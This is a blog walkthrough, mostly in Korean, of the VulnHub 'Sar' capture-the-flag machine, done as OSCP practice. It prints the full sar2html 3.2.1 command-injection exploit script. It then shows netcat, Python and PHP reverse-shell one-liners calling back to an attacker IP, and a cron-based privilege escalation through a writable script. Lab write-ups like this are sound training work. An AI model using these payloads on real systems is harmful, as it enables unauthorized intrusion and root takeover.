INFO
Name : Sar
Entry : 12 / 35
VulnHub URL : https://www.vulnhub.com/entry/sar-1,425/
Description : Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing.
GOAL
As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.
SETUP
I’m using both VMWare Workstation and Virtual box(depending on conditions of the image) to host Kali and the MisDirection image, with both VMs running in a NAT network(sometimes Bridged). I used VirtualBox this time.
TABLE OF CONTENTS
1. DISCOVERY
2. SCANNING
3. WEB RECONNAISSANCE
4. EXPLOITATION
5. POST EXPLOITATION
6. PRIVILEGE ESCALATION
1. DISCOVERY
: netdiscover
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.10.1 52:54:00:12:35:00 1 60 Unknown vendor
192.168.10.2 52:54:00:12:35:00 1 60 Unknown vendor
192.168.10.3 08:00:27:9b:dd:40 1 60 PCS Systemtechnik GmbH
192.168.10.29 08:00:27:05:48:e5 1 60 PCS Systemtechnik GmbH
2. SCANNING
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
3. WEB RECONNAISSANCE
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. + OSVDB-3233: /icons/README: Apache default file found. ---- Scanning URL: http://192.168.10.29/ ---- + http://192.168.10.29/index.html (CODE:200|SIZE:10918) + http://192.168.10.29/phpinfo.php (CODE:200|SIZE:95485) + http://192.168.10.29/robots.txt (CODE:200|SIZE:9) + http://192.168.10.29/server-status (CODE:403|SIZE:278)
80 port
/robots.txt
sar2HTML?
취약점 검색
┌──(root💀takudaddy)-[~]
└─# searchsploit sar2
------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------- ---------------------------------
sar2html 3.2.1 - 'plot' Remote Code Execution | php/webapps/49344.py
Sar2HTML 3.2.1 - Remote Command Execution | php/webapps/47204.txt
------------------------------------------------------------- ---------------------------------
┌──(root💀takudaddy)-[/study]
└─# cat 47204.txt
# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7
In web application you will see index.php?plot url extension.
http://<ipaddr>/index.php?plot=;<command-here> will execute
the command you entered. After command injection press "select # host" then your command's
output will appear bottom side of the scroll screen.
┌──(root💀takudaddy)-[/study]
└─# cat 49344.py
# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1
#!/usr/bin/env python3
import requests
import re
from cmd import Cmd
url = input("Enter The url => ")
class Terminal(Cmd):
prompt = "Command => "
def default(self, args):
exploiter(args)
def exploiter(cmd):
global url
sess = requests.session()
output = sess.get(f"{url}/index.php?plot=;{cmd}")
try:
out = re.findall("<option value=(.*?)>", output.text)
except:
print ("Error!!")
for ouut in out:
if "There is no defined host..." not in ouut:
if "null selected" not in ouut:
if "selected" not in ouut:
print (ouut)
print ()
if __name__ == ("__main__"):
terminal = Terminal()
terminal.cmdloop()
index.php?plot=;(command)
을 입력하고 'select # Host'를 누르면
결과를 볼 수 있을 거라고 한다.
Local Command Injection이
가능한 것 같다.
4. EXPLOITATION
위 안내대로
해당 취약점 파라미터를
url에 직접 입력하면
아무 정보도 나오지 않는다.
그도 그럴 것이 index.php 페이지가 없고
혹시 몰라 검색된 phpinfo.php에 대고도
실험해 봤지만 결과는 마찬가지였다.
혹시나 터미널에서 curl로 살펴보면
┌──(root💀takudaddy)-[/study]
└─# curl -v http://192.168.10.29/index.php?plot=;cat /etc/passwd
* Trying 192.168.10.29:80...
* Connected to 192.168.10.29 (192.168.10.29) port 80 (#0)
> GET /index.php?plot= HTTP/1.1
> Host: 192.168.10.29
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 404 Not Found
< Date: Wed, 31 Mar 2021 02:30:08 GMT
< Server: Apache/2.4.29 (Ubuntu)
< Content-Length: 275
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.10.29 Port 80</address>
</body></html>
* Connection #0 to host 192.168.10.29 left intact
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
??
되자나!!!!!
nc 가 있는지 확인!
┌──(root💀takudaddy)-[/study]
└─# curl http://192.168.10.29/index.php?plot=;which nc
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.10.29 Port 80</address>
</body></html>
/usr/bin/nc
공격서버에서 리스너를 기동시 켜주고
포트를 열어주면 정상 접속될 것이다.
┌──(root💀takudaddy)-[~]
└─# nc -lnvp 7979 1 ⨯
listening on [any] 7979 ...
┌──(root💀takudaddy)-[/study]
└─# curl http://192.168.10.29/index.php?plot=;nc -e /bin/sh 192.168.10.10 7979
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.10.29 Port 80</address>
</body></html>
┌──(root💀takudaddy)-[~]
└─# nc -lnvp 7979 1 ⨯
listening on [any] 7979 ...
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.10] 53712
id
uid=0(root) gid=0(root) groups=0(root),142(kaboxer)
와 성공!!!!!
근데 바로 root로 접속!!!
와!!! 끝..?
그럴 리가.. 자세히 보면
내 서버가 내 서버에 붙었다.
혼자 북 치고 장구 치고 했던 것.
삽질은 그만두고
/robots.txt 페이지에서 힌트로 주어진
'sar2HTML'은 또 다른 경로의 키워드였던 것.
십 여분만에 문제를 풀었다며
시험 문제가 이런 식으로 나오면
좋겠다는 둥 실력이 올라갔다는 둥
떠들어대며 좋아하던 내 모습이 부끄럽다.
세상은 만만치 않다.
계속 파보자.
좌측에 New 버튼을 누르니
레포트를 업로드할 수 있다.
옳거니!
파일 업로드가 가능한 거구나!
페이로드를 만들어 업로드를 해보았지만
말 그대로 레포트를 보고하는 역할일 뿐..
삽질에 연속이다.
하지만 그러다 url을 봤는데,
오호라~
익숙한 폼이다.
앞서 찾은 공격 문구 대입을 해본다.
=;id 입력 후 좌측에 Select Host 메뉴바를 누르면
찾았다.
이번엔 진짜라고요!
해당 작업을
위에서 받은 프로그램을 돌리면 더 편하다.
┌──(root💀takudaddy)-[/study]
└─# python3 a.py 1 ⨯
Enter The url => http://192.168.10.29/sar2HTML
Command => id
HPUX
Linux
SunOS
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Command => ls -al
HPUX
Linux
SunOS
total 160
drwxr-xr-x 4 www-data www-data 4096 Oct 20 2019 .
drwxr-xr-x 3 www-data www-data 4096 Oct 21 2019 ..
-rwxr-xr-x 1 www-data www-data 35149 Mar 14 2019 LICENSE
-rwxr-xr-x 1 www-data www-data 53446 Mar 19 2019 index.php
-rwxr-xr-x 1 www-data www-data 53165 Mar 19 2019 sar2html
drwxr-xr-x 4 www-data www-data 4096 Mar 31 08:33 sarDATA
drwxr-xr-x 3 www-data www-data 4096 Mar 19 2019 sarFILE
사용자 이름을 확인해 보고(love)
nc로 붙어본다 = 실패
fifo로 붙어본다 = 실패
그럼 파이썬 버전을 확인해보고
파이썬으로 리버스 쉘을
만들어 보자.
Command => which python
HPUX
Linux
SunOS
Command => which python3
HPUX
Linux
SunOS
/usr/bin/python3
python3가 설치되어 있다.
리버스 쉘 생성!
코드는 다음과 같은데
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.10”,7979));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
처음에는 실패!
그리고 이것저것 시도한 결과 알아낸 점으로는
띄어쓰기나 특수문자 등 입력이 안되기 때문에
url encoding을 해줘야 먹는다는 점이다.
%20python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.10.10%22,7979));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
http://192.168.10.30/sar2HTML/index.php?plot=;python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.10.10%22,7979));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
url에 입력 전 리스너를 기동시켜주고 입력하면
┌──(root💀takudaddy)-[/study]
└─# nc -lvp 7979 1 ⨯
listening on [any] 7979 ...
192.168.10.30: inverse host lookup failed: Unknown host
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.30] 50042
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
성공!
5. POST EXPLOITATION & PRIVILEGE ESCALATION
$ python -c 'import pty;pty.spawn("/bin/bash")'
/bin/sh: 1: python: not found
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@sar:/var/www/html/sar2HTML$
www-data@sar:/$ cd home
cd home
www-data@sar:/home$ ls -al
ls -al
total 12
drwxr-xr-x 3 root root 4096 Oct 20 2019 .
drwxr-xr-x 24 root root 4096 Oct 20 2019 ..
drwxr-xr-x 17 love love 4096 Oct 21 2019 love
www-data@sar:/home$ cd love
cd love
www-data@sar:/home/love$ ls -al
ls -al
total 92
drwxr-xr-x 17 love love 4096 Oct 21 2019 .
drwxr-xr-x 3 root root 4096 Oct 20 2019 ..
-rw------- 1 love love 3076 Oct 21 2019 .ICEauthority
-rw------- 1 love love 48 Oct 21 2019 .bash_history
-rw-r--r-- 1 love love 220 Oct 20 2019 .bash_logout
-rw-r--r-- 1 love love 3771 Oct 20 2019 .bashrc
drwx------ 13 love love 4096 Oct 21 2019 .cache
drwx------ 13 love love 4096 Oct 20 2019 .config
drwx------ 3 root root 4096 Oct 20 2019 .dbus
drwx------ 3 love love 4096 Oct 20 2019 .gnupg
drwx------ 2 root root 4096 Oct 20 2019 .gvfs
drwx------ 3 love love 4096 Oct 20 2019 .local
-rw-r--r-- 1 love love 807 Oct 20 2019 .profile
-rw-r--r-- 1 root root 66 Oct 20 2019 .selected_editor
drwx------ 2 love love 4096 Oct 20 2019 .ssh
-rw-r--r-- 1 love love 0 Oct 20 2019 .sudo_as_admin_successful
drwxr-xr-x 2 love love 4096 Oct 20 2019 Desktop
drwxr-xr-x 2 love love 4096 Oct 20 2019 Documents
drwxr-xr-x 2 love love 4096 Oct 20 2019 Downloads
drwxr-xr-x 2 love love 4096 Oct 20 2019 Music
drwxr-xr-x 2 love love 4096 Oct 21 2019 Pictures
drwxr-xr-x 2 love love 4096 Oct 20 2019 Public
drwxr-xr-x 2 love love 4096 Oct 20 2019 Templates
drwxr-xr-x 2 love love 4096 Oct 20 2019 Videos
www-data@sar:/home/love$ cd Desktop
cd Desktop
www-data@sar:/home/love/Desktop$ ls
ls
user.txt
www-data@sar:/home/love/Desktop$ cat user.txt
cat user.txt
427a7e47deb4a8649c7cab38df232b52
첫 번째 유저 플래그를 찾았다!
cd /var/www/html
www-data@sar:/var/www/html$ ls
www-data@sar:/var/www/html$ ls -al
ls -al
total 40
drwxr-xr-x 3 www-data www-data 4096 Oct 21 2019 .
drwxr-xr-x 4 www-data www-data 4096 Oct 21 2019 ..
-rwxr-xr-x 1 root root 22 Oct 20 2019 finally.sh
-rw-r--r-- 1 www-data www-data 10918 Oct 20 2019 index.html
-rw-r--r-- 1 www-data www-data 21 Oct 20 2019 phpinfo.php
-rw-r--r-- 1 root root 9 Oct 21 2019 robots.txt
drwxr-xr-x 4 www-data www-data 4096 Mar 31 10:16 sar2HTML
-rwxrwxrwx 1 www-data www-data 30 Oct 21 2019 write.sh
www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh
#!/bin/sh
./write.sh
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/sh
touch /tmp/gateway
root 권한의 finally.sh 파일 내용을 보면
root 권한으로 ./write.sh 파일을 실행시킨다.
./write.sh 파일은 현 사용자의 권한으로
되어있어 실행 및 수정이 가능한데
그렇다면 해당 파일을 알맞게 수정 후
root가 실행시킬 때까지 (아마 cron으로
실행시키는 듯) 기다리면 될 듯하다.
일단 크론에 등록된 내용부터 확인
www-data@sar:/tmp$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
매 5분마다 ./finally.sh 파일이 실행되고 있다.
php reverse shell을 등록해 연결해보자.
명령어는 아래와 같은데
$ echo "php -r '$sock=fsockopen("192.168.10.10",8989);exec("/bin/sh -i <&3 >&3 2>&3");'" >> write.sh
특수 문자 입력을 못 받아
입력이 정상적으로 안되었다.
때문에 해당 부분 백 슬래쉬 처리를 해줘야
정상 입력된다.
$ echo "php -r '\$sock=fsockopen(\"192.168.10.10\",8989);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" >> write.sh
www-data@sar:/var/www/html$ echo "php -r '$sock=fsockopen(\"192.168.10.10\",8989);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" >> write.sh
<9);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" >> write.sh
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/sh
touch /tmp/gateway
php -r '=fsockopen("192.168.10.10",8989);exec("/bin/sh -i <&3 >&3 2>&3");'
www-data@sar:/var/www/html$ echo "php -r '\$sock=fsockopen(\"192.168.10.10\",8989);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" >> write.sh
<9);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" >> write.sh
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/sh
touch /tmp/gateway
php -r '=fsockopen("192.168.10.10",8989);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.10.10",8989);exec("/bin/sh -i <&3 >&3 2>&3");'
등록 후 혹은 전
리스너를 기동해 대기하고 있으면
┌──(root💀takudaddy)-[/var/www/html]
└─# nc -lvp 8989 1 ⚙
listening on [any] 8989 ...
192.168.10.30: inverse host lookup failed: Unknown host
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.30] 53884
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# python3 -c 'import pty;pty.spawn("/bin/bash")'
root@sar:/var/www/html# cd /root
cd /root
root@sar:~# ls
ls
root.txt
root@sar:~# cat root.txt
cat root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99
프로그램이 실행되며
root로 연결에 성공한다.
끝
'OSCP > Vulnahub' 카테고리의 다른 글
14. EVM (0) | 2021.04.01 |
---|---|
13. djinn (1) | 2021.04.01 |
11. MisDirection (0) | 2021.03.30 |
10. Symfonos 5 (0) | 2021.03.29 |
9. Symfonos 3 (0) | 2021.03.28 |